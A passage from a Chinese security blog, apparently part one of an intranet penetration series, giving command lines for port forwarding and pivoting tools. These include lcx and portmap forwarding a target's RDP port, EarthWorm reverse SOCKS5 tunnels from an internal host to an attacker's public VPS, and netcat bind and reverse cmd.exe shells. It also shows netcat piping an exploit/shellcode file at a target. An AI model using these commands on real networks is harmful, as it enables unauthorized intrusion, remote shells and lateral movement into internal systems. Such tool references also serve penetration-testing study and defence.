小白安全博客

小白记忆
专注网络安全

 Intranet Penetration(part one): 端口转发&&边界代理工具

windows

1.lcx

lcx.exe 使用教程:

监听1234端口,转发数据到2333端口
本地:

lcx.exe -listen 1234 2333



将目标的3389转发到本地的1234端口

远程:lcx.exe -slave ip 1234 127.0.0.1:3389

查看项目源码:https://github.com/henang/Intranet-Penetration/blob/master/tools/lcx


DQmUJjH9CPQqP7owQgULJVtZQe6mXmdUNdnTKG8XcL8T2e5.png

2.EW

Earthworm    http://rootkiter.com/Termite/

0x01 正向 SOCKS5 服务器

当目标网络边界存在公网 IP 且可任意开监听端口

ew_for_Win.exe -s ssocksd -l 8888


上述命令是在该机器开启一个 8888 的正向连接端口。然后其它主机可通过设置代理为 192.168.153.140:8888 添加这个代理


0x02 反弹 SOCKS5 服务器


当目标网络边界不存在公网 IP,通过反弹方式创建 socks 代理。先在一台具有公网 ip 的主机 A 上运行以下命令


./ew_for_linux64 -s rcsocks -l 1080 -e 8888


意思是在我们公网 VPS 上添加一个转接隧道,把 1080 端口收到的代理请求转交给 8888 端口


在目标主机 B 上启动 SOCKS5 服务 并反弹到公网主机的 8888 端口


ew_for_Win.exe -s rssocks -d 公网Aip -e 8888

然后通过添加公网A ip:1080 这个代理, 来访问机器B内网

linux

1.portmap

DQmYthfFknxTcCW86MNu85uN7pX474X5BxFTuku1qP79X5X_1680x8400.jpeg

监听1234端口,转发数据到2333端口

本地:

./portmap -m 2 -p1 1234 -p2 2333 

将目标的3389转发到本地的1234端口

./portmap -m 1 -p1 3389 -h2 ip -p2 1234 

windows&&linux

1.ngrok

官网 : https://www.ngrok.cc/

 官方给出了使用方法

DQmPbBZdJUKkoyN4BZ9Rfizp16qBiuRNqAxdKzci8PA2d9n.png

视频教程:http://compaign.tudou.com/v/658801319.html?


2. nc

作者:Hobbit && Chris Wysopal
网址:http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10 NT]

基本用法:

大概有以下几种用法:

1.连接到REMOTE主机,例子:
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口

2.监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口

3.扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口

4.REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5.REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法(其实NC的用法还有很多,
当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。

高级用法:

6.作攻击程序用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
讲解:连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)

附:c:exploit.txt为shellcode等

连接工具

1.reGeorg

2.Proxifier

3.proxychains






×

感谢您的支持,我们会一直保持!

扫码支持
请土豪扫码随意打赏,请先点一下下面的付款方式

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

 您阅读这篇文章共花了:

打赏作者
版权所有,转载注明出处:小白安全博客-菜鸟安全博客-小白个人博客 » Intranet Penetration(part one): 端口转发&&边界代理工具»https://www.xiaobaibk.com/xiao-bai-246.html
标签: Intranet penetration

发表评论

表情

网友评论(0)